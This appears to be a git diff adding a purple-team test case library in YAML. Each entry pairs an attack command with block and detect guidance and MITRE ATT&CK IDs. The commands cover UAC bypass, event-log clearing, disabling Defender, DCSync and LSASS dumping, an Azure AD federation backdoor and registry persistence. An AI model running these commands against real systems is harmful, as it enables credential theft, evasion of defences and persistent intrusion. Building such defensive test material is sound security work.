@@ -0,0 +1,1096 @@ +OT: +- name: Replay PCAP for OT service command + description: Replay a packet capture of a dangerous OT-specific service commands (e.g. S7 stop) to simulate the traffic for passive OT security controls + platforms: + guidance: + - shell> tcpreplay -i {{ interface }} {{ pcap_file }} + block: + - '' + detect: + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + - Passive network security sensors detect anomalous network traffic + controls: + - Endpoint Protection + - SIEM + - ID/PS + metadata: + id: b7cefb21-5835-478e-8541-b09d15c11948 + tid: T1021 + tactic: TA0008 + x_vectr_id: b7cefb21-5835-478e-8541-b09d15c11948 + isv: 1 +- name: Replay PCAP for Triton + description: Replay a packet capture of a dangerous Triton malware to simulate the traffic for passive OT security controls + platforms: + guidance: + - shell> tcpreplay -i {{ interface }} {{ pcap_file }} + block: + - '' + detect: + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + - Passive network security sensors detect malicious network traffic + controls: + - Endpoint Protection + - SIEM + - ID/PS + metadata: + id: 3ac5c6b7-aa22-4359-9506-c675391c8b63 + tid: T1021 + tactic: TA0008 + x_vectr_id: 3ac5c6b7-aa22-4359-9506-c675391c8b63 + isv: 1 +- name: Lateral movement via remote service to OT system + description: Move laterally to another system using a remote service (e.g. 
SSH, RDP) + platforms: + guidance: + block: + - '' + detect: + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + - Identity Threat Protection + metadata: + id: 0abf446d-3422-4b78-a029-a3485be7be2f + tid: T1021 + tactic: TA0008 + x_vectr_id: 0abf446d-3422-4b78-a029-a3485be7be2f + isv: 1 +- name: Internal port scan against OT network + description: Run internal port scan to probe for interesting OT-specific ports + platforms: + guidance: + - shell> nmap -n -v --scan-delay 1 --open -Pn -sT -p 20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000 -oA {{ outfiles_name }} {{ cidr }} + block: + - Network security controls block source generating a large volume of connection requests + detect: + - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs + controls: + - Firewall + - ID/PS + metadata: + id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4 + tid: T1046 + tactic: TA0007 + x_references: + - https://github.com/ITI/ICS-Security-Tools/blob/master/protocols/PORTS.md + x_vectr_id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4 + isv: 1 +- name: Network services scan against OT target + description: Scan an OT system for OT-specific network services + platforms: + guidance: + - shell> nmap -n -v --scan-delay 1 --open -Pn --script {{ scripts_directory }} -oA {{ outfiles_name }} {{ cidr }} + block: + - Network security controls block source generating a large volume of connection requests + detect: + - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs + controls: + - Firewall + - ID/PS + metadata: + id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608 + 
tid: T1046 + tactic: TA0007 + x_references: + - https://github.com/cckuailong/ICS-Protocal-Detect-Nmap-Script/tree/master + x_vectr_id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608 + isv: 1 +- name: MQTT C2 over TCP/1883 + description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over MQTT + platforms: + guidance: + block: + - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool + detect: + - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool + - Look for unexpected network connections, such as those using MQTT, egressing from the internal network to the Internet by using network traffic logs, such as firewall logs and flow logs + controls: + - Firewall + - ID/PS + metadata: + id: 85c528ae-0337-45c8-a413-41d59a67b924 + tid: T1071 + tactic: TA0011 + x_vectr_id: 85c528ae-0337-45c8-a413-41d59a67b924 + isv: 1 +- name: Transfer tool remotely to OT target + description: Copy a payload to a remote target + platforms: + guidance: + block: + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + metadata: + id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b + tid: T1570 + tactic: TA0008 + x_vectr_id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b + isv: 1 +- name: Remote service login brute force for OT target + description: Attempt to login as a user via a remote service (e.g. 
SSH, Telnet) using multiple passwords + platforms: + guidance: + block: + - Network security controls block source generating a large volume of connection requests + detect: + - Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs + controls: + - SIEM + - Hardening + metadata: + id: 9b542d39-29c9-4659-9756-6813426ff41b + tid: T1110.001 + tactic: TA0006 + x_vectr_id: 9b542d39-29c9-4659-9756-6813426ff41b + isv: 1 +Initial Access: +- name: Prompt a user with multiple MFA requests + description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt. + platforms: + guidance: + block: + - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint + detect: + - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour). 
+ controls:
+ - IdP
+ metadata:
+ id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ tid: T1621
+ tactic: TA0006
+ x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ isv: 1
+- name: Attachment - Macro
+ description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+ platforms:
+ guidance:
+ - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ isv: 1
+- name: Attachment - ISO
+ description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+ platforms:
+ guidance:
+ - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ isv: 1
+- name: Link - Zipped DLL via sharing
+ description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service
+ platforms:
+ guidance:
+ - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined 
or link inside email rewritten/stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+ tid: T1566.002
+ tactic: TA0001
+ x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+ isv: 1
+Execution:
+- name: Macro - Remote Template
+ description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+ platforms:
+ - windows
+ guidance:
+ block:
+ - Macro execution is blocked by GPO policy
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Payload on disk deleted/quarantined by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Payload on disk triggers an alert with endpoint security tool
+ controls:
+ - Endpoint Protection
+ - Hardening
+ - SIEM
+ metadata:
+ id: a7134d71-dc49-41a8-a309-ec520c96a089
+ tid: T1221
+ tactic: TA0005
+ x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+ isv: 1
+Defense Evasion:
+- name: Load known-abusable kernel driver
+ description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+ platforms:
+ - windows
+ guidance:
+ - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+ block:
+ - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics. 
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+ - https://www.loldrivers.io/
+ - Anomalous driver load blocked by endpoint security tool
+ detect:
+ - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+ controls:
+ - Hardening
+ - Endpoint Protection
+ metadata:
+ id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ tid: T1014
+ tactic: TA0005
+ x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ isv: 1
+- name: DLL execution using Rundll32
+ description: Execute a malicious DLL's function directly using rundll32
+ platforms:
+ - windows
+ guidance:
+ - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Payload on disk deleted/quarantined by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ tid: T1218.011
+ tactic: TA0005
+ x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ isv: 1
+- name: Bypass User Account Control (UAC) via fodhelper
+ description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+ platforms:
+ - windows
+ guidance:
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+ - cmd> c:\windows\system32\fodhelper.exe
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Suspicious Windows 
Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+ controls:
+ - SIEM
+ - Endpoint Protection
+ metadata:
+ id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ tid: T1548.002
+ tactic: TA0004
+ x_references:
+ - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+ x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ isv: 1
+- name: Clear Windows Event Log entries
+ description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+ platforms:
+ - windows
+ guidance:
+ - CMD> wevtutil clear-log Security
+ - CMD> wevtutil clear-log Application
+ - CMD> wevtutil clear-log System
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ tid: T1070.001
+ tactic: TA0005
+ x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ isv: 1
+- name: Sideload a DLL into a legitimate application
+ description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+ platforms:
+ - windows
+ guidance:
+ - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. 
a DLL expected to be in System32 being loaded from a temp folder)
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 2496e250-5757-482f-9661-daea872395ae
+ tid: T1574.002
+ tactic: TA0005
+ x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+ isv: 1
+- name: Modify identity policy in IdP
+ description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+ platforms:
+ guidance:
+ block:
+ - ''
+ detect:
+ - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+ controls:
+ - SIEM
+ metadata:
+ id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ tid: T1484
+ tactic: TA0003
+ x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ isv: 1
+- name: Disable Windows Defender via PowerShell
+ description: Use PowerShell's Set-MpPreference to disable Windows Defender
+ platforms:
+ - windows
+ guidance:
+ - PS> Set-MpPreference -DisableBehaviorMonitoring $true
+ - PS> Set-MpPreference -DisableRealtimeMonitoring $true
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 
5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ tid: T1562.001
+ tactic: TA0005
+ x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ isv: 1
+Discovery:
+- name: Domain Controller discovery via nltest
+ description: Use nltest.exe to identify domain controllers in the domain
+ platforms:
+ - windows
+ guidance:
+ - cmd> nltest.exe /dclist:{{ domain }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ tid: T1018
+ tactic: TA0007
+ x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ isv: 1
+- name: Enumerate domain groups and users using net
+ description: Enumerate domain users and domain groups using the builtin net.exe
+ platforms:
+ - windows
+ guidance:
+ - cmd> net user /domain
+ - cmd> net group /domain
+ - cmd> net group "Domain Admins" /domain
+ - cmd> net group "Domain Computers" /domain
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). 
Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ tid: T1087.002
+ tactic: TA0007
+ x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ isv: 1
+- name: BloodHound DC enumeration
+ description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+ platforms:
+ guidance:
+ - cmd> SharpHound.exe -c DcOnly
+ block:
+ - ''
+ detect:
+ - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+ - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+ - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ metadata:
+ id: 672f8861-c914-4f58-b861-5107ce19f61c
+ tid: T1087.002
+ tactic: TA0007
+ x_tools:
+ - https://github.com/BloodHoundAD/SharpHound
+ x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+ isv: 1
+Command and Control:
+- name: HTTP C2 over tcp/80
+ description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+ platforms:
+ guidance:
+ block:
+ - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+ detect:
+ - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ isv: 1
+- name: HTTPS C2 over tcp/443
+ description: Establish a bidirectional command-and-control 
connection from a managed asset to an external server on the Internet over HTTPS
+ platforms:
+ guidance:
+ block:
+ - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+ detect:
+ - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ isv: 1
+- name: Access via remote assistance tool
+ description: Establish connection to system using a legitimate remote assistance application
+ platforms:
+ guidance:
+ block:
+ - Block the installation and use of unapproved third-party utilities via application control software
+ - Connections to known remote access service domains/IPs are blocked
+ - Remote access connection attempts originating from users outside of the tenant are blocked
+ detect:
+ - Connections to known remote access service domains/IPs are detected
+ controls:
+ - Application Control
+ - ID/PS
+ - Firewall
+ metadata:
+ id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ tid: T1219
+ tactic: TA0011
+ x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ isv: 1
+- name: Remote tool download over HTTP
+ description: Download a tool from a public hosting location onto the victim system
+ platforms:
+ guidance:
+ block:
+ - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+ detect:
+ - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ tid: T1105
+ tactic: TA0011
+ x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ isv: 1
+Lateral Movement:
+- name: Lateral Movement via WMI
+ description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+ platforms:
+ - windows
+ 
guidance:
+ - CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Host-based firewalls prevent direct communications over common ports/protocols
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+ controls:
+ - Endpoint Protection
+ - SIEM
+ - Identity Threat Protection
+ - Hardening
+ metadata:
+ id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+ tid: T1021.003
+ tactic: TA0008
+ x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+ isv: 1
+- name: Lateral Movement via PsExec
+ description: Move to another system by creating a service remotely via Sysinternals PsExec
+ platforms:
+ - windows
+ guidance:
+ - CMD> psexec -s \{{ target }} {{ command }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Host-based firewalls prevent direct communications over common ports/protocols
+ - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+ controls:
+ - Endpoint Protection
+ - SIEM
+ - Identity Threat Protection
+ - Hardening
+ metadata:
+ id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ tid: T1021.002
+ tactic: TA0008
+ x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ isv: 1
+- name: 
Lateral Movement via RDP
+ description: Perform an interactive logons to a Windows system via RDP
+ platforms:
+ - windows
+ guidance:
+ - CMD> mstsc /v:{{ target }}
+ block:
+ - Host-based firewalls prevent direct communications over common ports/protocols
+ detect:
+ - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ - Hardening
+ metadata:
+ id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+ tid: T1021.001
+ tactic: TA0008
+ x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+ isv: 1
+Persistence:
+- name: Persist via new scheduled task
+ description: Persist on a system by creating a new scheduled task
+ platforms:
+ - windows
+ guidance:
+ - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks. 
+ controls:
+ - SIEM
+ - Endpoint Protection
+ metadata:
+ id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ tid: T1053.005
+ tactic: TA0003
+ x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ isv: 1
+- name: Persist via new Windows service
+ description: Persist on a system by creating a new service
+ platforms:
+ - windows
+ guidance:
+ - CMD> sc create {{ service_name }} binPath= "{{ command }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+ controls:
+ - SIEM
+ - Endpoint Protection
+ metadata:
+ id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ tid: T1543.003
+ tactic: TA0003
+ x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ isv: 1
+- name: Persist via Registry Winlogon Shell
+ description: Run a payload during user login by setting a Registry Winlogon key
+ platforms:
+ - windows
+ guidance:
+ - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). 
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ tid: T1547.004
+ tactic: TA0003
+ x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ isv: 1
+- name: Persist via Registry "Run" key
+ description: Run a payload during user login and startup by setting a registry run key
+ platforms:
+ - windows
+ guidance:
+ - CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+ tid: T1547.001
+ tactic: TA0003
+ x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+ isv: 1
+- name: Register a new device in Azure AD
+ description: Register a new device in Azure AD
+ platforms:
+ - azuread
+ guidance:
+ - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+ block:
+ - 'Prevent users outside of approved groups from being able to register new devices in the tenant. 
Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+ detect:
+ - Detect anomalous device registration events by using Azure audit logs
+ controls:
+ - SIEM
+ - Hardening
+ metadata:
+ id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ tid: T1098.005
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - htpts://aadinternals.nom/post/prt/
+ x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ isv: 1
+- name: Configure a custom federated domain
+ description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+ platforms:
+ - azuread
+ guidance:
+ - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+ block:
+ - ''
+ detect:
+ - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+ - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+ controls:
+ - SIEM
+ metadata:
+ id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ tid: T1484.002
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - https://o365blog.com/post/aadbackdoor/
+ x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ isv: 1
+Credential Access:
+- name: Extract domain user credentials via replication
+ description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+ platforms:
+ - windows
+ guidance:
+ - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+ block:
+ - ''
+ detect:
+ - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. 
either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+ - https://blog.blacklanternsecurity.com/p/detecting-dcsync
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ metadata:
+ id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ tid: T1003.006
+ tactic: TA0006
+ x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ isv: 1
+- name: Extract Logonpasswords via Nanodump
+ description: Use nanodump to extract credentials from LSASS process memory
+ platforms:
+ - windows
+ guidance:
+ - cmd> nanodump.exe --duplicate -w {{ out_file }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Enable Credential Guard to prevent traditional process dumping of LSASS
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ - Hardening
+ metadata:
+ id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ isv: 1
+- name: Dump LSASS memory using builtin comsvcs.dll
+ description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+ platforms:
+ - windows
+ guidance:
+ - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Enable Credential Guard to prevent traditional process dumping of LSASS
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ controls:
+ - SIEM
+ - Endpoint Protection
+ - Hardening
+ metadata:
+ id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ isv: 1
+- name: Dump LSASS memory using Sysinternals ProcDump
+ description: Use ProcDump from Sysinternals to dump LSASS process memory
+ platforms:
+ - windows
+ 
guidance:
+ - CMD> procdump -ma lsass.exe dump
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Enable Credential Guard to prevent traditional process dumping of LSASS
+ - Block the installation and use of unapproved third-party utilities via application control software
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ controls:
+ - SIEM
+ - Endpoint Protection
+ - Hardening
+ - Application Control
+ metadata:
